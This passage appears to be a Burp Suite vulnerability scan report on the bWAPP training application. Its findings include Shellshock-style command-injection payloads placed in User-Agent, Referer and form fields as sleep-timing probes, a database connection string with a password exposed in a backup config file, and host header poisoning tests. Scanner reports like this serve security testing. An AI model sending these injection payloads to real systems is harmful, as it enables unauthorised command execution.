...[SNIP]...
</p>

<form action="/bWAPP/user_extra.php" method="POST">

<table>
...[SNIP]...
<br />
<input type="password" id="password" name="password"></p>
...[SNIP]...
<br />
<input type="password" id="password_conf" name="password_conf"></p>
...[SNIP]...
4.13. http://192.168.52.147/bWAPP/user_new.php
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/user_new.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /bWAPP/user_new.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/login.php
Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:52:17 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Content-Length: 3417
Connection: close
Content-Type: text/html

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
</p>

<form action="/bWAPP/user_new.php" method="POST">

<table>
...[SNIP]...
<br />
<input type="password" id="password" name="password"></p>
...[SNIP]...
<br />
<input type="password" id="password_conf" name="password_conf"></p>
...[SNIP]...
4.14. http://192.168.52.147/bWAPP/xmli_1.php
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/xmli_1.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /bWAPP/xmli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:57:14 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13136

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
</p>

<form action="/bWAPP/xmli_1.php" method="GET">

<p>
...[SNIP]...
<br />
<input type="password" id="password" name="password" size="20" autocomplete="off" /></p>
...[SNIP]...
4.15. http://192.168.52.147/bWAPP/xss_login.php
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/xss_login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /bWAPP/xss_login.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security=maybe

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:57:24 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13122

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
</p>

<form action="/bWAPP/xss_login.php" method="POST">

<p>
...[SNIP]...
<br />
<input type="password" id="password" name="password" size="20" autocomplete="off" /></p>
...[SNIP]...
5. Code injection
Previous  Next

There are 3 instances of this issue:

5.1. http://192.168.52.147/bWAPP/cgi-bin/shellshock.sh [User-Agent HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/cgi-bin/shellshock.sh

Note: This issue was generated by the Burp extension: Active Scan++.

Issue detail

The application appears to evaluate user input as code.

It was instructed to sleep for 0 seconds, and a response time of 0.34299993515 seconds was observed.
It was then instructed to sleep for 10 seconds, which resulted in a response time of 11.256000042 seconds

Request 1

GET /bWAPP/cgi-bin/shellshock.sh HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: () { :;}; /bin/sleep 0
Connection: close
Referer: http://192.168.52.147/bWAPP/shellshock.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

Response 1

HTTP/1.1 500 Internal Server Error
Date: Fri, 09 Mar 2018 03:17:37 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Content-Length: 709
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /bWAPP/cgi-bin/shellshock.sh HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: () { :;}; /bin/sleep 11
Connection: close
Referer: http://192.168.52.147/bWAPP/shellshock.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

Response 2

HTTP/1.1 500 Internal Server Error
Date: Fri, 09 Mar 2018 03:17:37 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Content-Length: 709
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
5.2. http://192.168.52.147/bWAPP/clickjacking.php [bug parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/clickjacking.php

Note: This issue was generated by the Burp extension: Active Scan++.

Issue detail

The application appears to evaluate user input as code.

It was instructed to sleep for 0 seconds, and a response time of 0.0809998512268 seconds was observed.
It was then instructed to sleep for 10 seconds, which resulted in a response time of 15.1239998341 seconds

Request 1

POST /bWAPP/clickjacking.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/clickjacking.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F

bug=()%20%7b%20_%3b%20%7d%20%3e_[$($())]%20%7b%20%2fbin%2fsleep%200%3b%20%7d&form_bug=submit

Response 1

HTTP/1.1 302 Found
Date: Fri, 09 Mar 2018 04:02:19 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location:
Content-Length: 0
Connection: close
Content-Type: text/html

Request 2

POST /bWAPP/clickjacking.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/clickjacking.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F

bug=()%20%7b%20_%3b%20%7d%20%3e_[$($())]%20%7b%20%2fbin%2fsleep%2011%3b%20%7d&form_bug=submit

Response 2

HTTP/1.1 302 Found
Date: Fri, 09 Mar 2018 04:02:19 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location:
Content-Length: 0
Connection: close
Content-Type: text/html

5.3. http://192.168.52.147/bWAPP/commandi.php [Referer HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/commandi.php

Note: This issue was generated by the Burp extension: Active Scan++.

Issue detail

The application appears to evaluate user input as code.

It was instructed to sleep for 0 seconds, and a response time of 0.0280001163483 seconds was observed.
It was then instructed to sleep for 10 seconds, which resulted in a response time of 11.0279998779 seconds

Request 1

GET /bWAPP/commandi.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: () { _; } >_[$($())] { /bin/sleep 0; }
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:41:43 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12930

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...

Request 2

GET /bWAPP/commandi.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: () { _; } >_[$($())] { /bin/sleep 11; }
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:41:43 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12930

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
6. Session token in URL
Previous  Next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/csrf_2.php

Issue detail

The URL in the request appears to contain a session token within the query string:
  • http://192.168.52.147/bWAPP/csrf_2.php?amount=0&action=transfer&account=123-45678-90&token=8ffdc6d2c70804d4f177b2198dd4603d313efb70

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Vulnerability classifications

Request 1

GET /bWAPP/csrf_2.php?amount=0&action=transfer&account=123-45678-90&token=8ffdc6d2c70804d4f177b2198dd4603d313efb70 HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/csrf_2.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:57:29 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13464

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
7. Database connection string disclosed
Previous  Next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/passwords/web.config.bak

Issue detail

The following database connection string was disclosed in the response:
  • datasource=bee-box;initialcatalog=bwapp;persistsecurityinfo=true;userid=wolverine;password=log@n
The connection string appears to contain:
  • Database name or location
  • Username
  • Password
  • Issue background

    A database connection string specifies information about a data source and the means of connecting to it. In web applications, connection strings are generally used by the application tier to connect to the back database used for storing application data. They are usually read from server-side configuration files or hard-coded into application source code.

    Vulnerability classifications

    Request 1

    GET /bWAPP/passwords/web.config.bak HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/passwords/?C=N;O=D
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:29 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce017-1d84-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 7556
    Connection: close
    Content-Type: application/x-trash

    ...<?xml version="1.0"?>
    <configuration>
       <configSections>
           <sectionGroup name="system.web.extensions" type="System.Web.Configuration.SystemWebExtensionsSectionGroup, System.Web.Extensions, Versio
    ...[SNIP]...
    <add name="bWAPPConnectionString" connectionString="Data Source=bee-box;Initial Catalog=bWAPP;Persist Security Info=True;User ID=wolverine;Password=Log@N"/>
    ...[SNIP]...
    8. The file 'sqli_10-1.php' includes a vulnerable version of the library 'jquery'
    Previous  Next

    There are 3 instances of this issue:

    8.1. http://192.168.52.147/bWAPP/sqli_10-1.php
    Previous  Next

    Summary

    Severity:   Medium
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/sqli_10-1.php

    Note: This issue was generated by the Burp extension: Retire.js.

    Issue detail

    The library jquery version 1.4.4.min has known security issues.
    For more information, visit those websites:

    Affected versions

    The vulnerability is affecting all versions prior 1.6.3 (between * and 1.6.3)

    Other considerations

    The vulnerability might be affecting a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be consider as false positive.

    The library name and its version are identify based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

    Request 1

    GET /bWAPP/sqli_10-1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:13 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 14733

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    <script src="js/jquery-1.4.4.min.js">
    ...[SNIP]...
    8.2. http://192.168.52.147/bWAPP/sqli_10-1.php
    Previous  Next

    Summary

    Severity:   Medium
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/sqli_10-1.php

    Note: This issue was generated by the Burp extension: Retire.js.

    Issue detail

    The library jquery version 1.4.4.min has known security issues.
    For more information, visit those websites:

    Affected versions

    The vulnerability is affecting all versions prior 1.9.0b1 (between * and 1.9.0b1)

    Other considerations

    The vulnerability might be affecting a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be consider as false positive.

    The library name and its version are identify based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

    Request 1

    GET /bWAPP/sqli_10-1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:13 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 14733

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    <script src="js/jquery-1.4.4.min.js">
    ...[SNIP]...
    8.3. http://192.168.52.147/bWAPP/sqli_10-1.php
    Previous  Next

    Summary

    Severity:   Medium
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/sqli_10-1.php

    Note: This issue was generated by the Burp extension: Retire.js.

    Issue detail

    The library jquery version 1.4.4.min has known security issues.
    For more information, visit those websites:

    Affected versions

    The vulnerability is affecting all versions prior 1.12.0 (between 1.4.0 and 1.12.0)

    Other considerations

    The vulnerability might be affecting a feature of the library that the website is not using. If the vulnerable feature is not used, this alert can be consider as false positive.

    The library name and its version are identify based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

    Request 1

    GET /bWAPP/sqli_10-1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:13 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 14733

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    <script src="js/jquery-1.4.4.min.js">
    ...[SNIP]...
    9. Host header poisoning
    Previous  Next

    There are 6 instances of this issue:

    9.1. http://192.168.52.147/bWAPP/aim.php [PHPSESSID cookie]
    Previous  Next

    Summary

    Severity:   Medium
    Confidence:   Tentative
    Host:   http://192.168.52.147
    Path:   /bWAPP/aim.php

    Note: This issue was generated by the Burp extension: Active Scan++.

    Issue detail

    The application appears to trust the user-supplied host header. By supplying a malicious host header with a password reset request, it may be possible to generate a poisoned password reset link. Consider testing the host header for classic server-side injection vulnerabilities.

    Depending on the configuration of the server and any intervening caching devices, it may also be possible to use this for cache poisoning attacks.

    Resources:
    • http://carlos.bueno.org/2008/06/host-header-injection.html
    • http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html

    Request 1

    GET /bWAPP/aim.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/http_response_splitting.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 03:03:23 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 9959

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" />

    <title>bWAPP -
    ...[SNIP]...

    Request 2

    GET /bWAPP/aim.php?cachebust=1520564607.25 HTTP/1.1
    Host: ueznlk.192.168.52.147
    Cache-Control: no-cache
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/http_response_splitting.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 2

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 03:03:27 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 9990

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" />

    <title>bWAPP -
    ...[SNIP]...
    <p>2. Point your web scanner, crawler or attack tool to this URL: http://ueznlk.192.168.52.147/bWAPP/aim.php?cachebust=1520564607.25</p>
    ...[SNIP]...
    9.2. http://192.168.52.147/bWAPP/fonts/ [security_level cookie]
    Previous  Next

    Summary

    Severity:   Medium
    Confidence:   Tentative
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/

    Note: This issue was generated by the Burp extension: Active Scan++.

    Issue detail

    The application appears to trust the user-supplied host header. By supplying a malicious host header with a password reset request, it may be possible to generate a poisoned password reset link. Consider testing the host header for classic server-side injection vulnerabilities.

    Depending on the configuration of the server and any intervening caching devices, it may also be possible to use this for cache poisoning attacks.

    Resources:
    • http://carlos.bueno.org/2008/06/host-header-injection.html
    • http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html

    Request 1

    GET /bWAPP/fonts/ HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 04:24:53 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Content-Length: 2527
    Connection: close
    Content-Type: text/html;charset=UTF-8
    X-Pad: avoid browser bug

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
    <html>
    <head>
    <title>Index of /bWAPP/fonts</title>
    </head>
    <body>
    <h1>Index of /bWAPP/fonts</h1>
    <table><tr><th><img src="/icons/blank.gif"
    ...[SNIP]...

    Request 2

    GET /bWAPP/fonts/?cachebust=1520569491.18 HTTP/1.1
    Host: br78zs.192.168.52.147
    Cache-Control: no-cache
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 2

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 04:24:54 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Content-Length: 2534
    Connection: close
    Content-Type: text/html;charset=UTF-8
    X-Pad: avoid browser bug

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
    <html>
    <head>
    <title>Index of /bWAPP/fonts</title>
    </head>
    <body>
    <h1>Index of /bWAPP/fonts</h1>
    <table><tr><th><img src="/icons/blank.gif"
    ...[SNIP]...
    <address>Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g Server at br78zs.192.168.52.147 Port 80</address>
    ...[SNIP]...
    9.3. http://192.168.52.147/bWAPP/logs/ [PHPSESSID cookie]
    Previous  Next

    Summary

    Severity:   Medium
    Confidence:   Tentative
    Host:   http://192.168.52.147
    Path:   /bWAPP/logs/

    Note: This issue was generated by the Burp extension: Active Scan++.

    Issue detail

    The application appears to trust the user-supplied host header. By supplying a malicious host header with a password reset request, it may be possible to generate a poisoned password reset link. Consider testing the host header for classic server-side injection vulnerabilities.

    Depending on the configuration of the server and any intervening caching devices, it may also be possible to use this for cache poisoning attacks.

    Resources:
    • http://carlos.bueno.org/2008/06/host-header-injection.html
